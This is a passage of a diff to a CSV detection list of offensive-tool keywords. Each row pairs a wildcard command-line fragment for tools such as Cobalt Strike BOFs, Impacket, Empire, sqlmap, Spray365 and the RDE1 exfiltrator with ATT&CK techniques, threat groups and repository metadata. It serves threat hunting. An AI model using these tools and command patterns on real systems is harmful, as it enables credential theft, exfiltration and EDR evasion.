-Target *.exe -Sign*","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","0","N/A","9","4","303","72","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" -"* spawn.x64.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" -"* spawn.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" -"* spawnto_x64 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"* spawnto_x86 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* spawn.x64.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"* spawn.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","0","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"* spawnto_x64 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* spawnto_x86 *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "* spellgen.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* spellstager.py *","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" "* -spn cifs* -session * -clsid * -secrets*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" -"* -spn cifs/* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"* -SpooferIP *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -spn cifs/* -hashes*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"* -SpooferIP *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Tater.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* SpoolFool *.dll","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* spoolsploit *","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" "* spray -ep ex-plan.s365*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" -"* --sql-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" -"* srde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* srde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" -"* SRVHOST=127.0.0.1 SRVPORT=4444 RAND=12345*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --sql-shell*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* srde_arm_musl https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_armv7 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_debug https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux_aarch64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_linux_x86_64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_macos https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_release https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows_x64 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* srde_windows_x86 https -*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 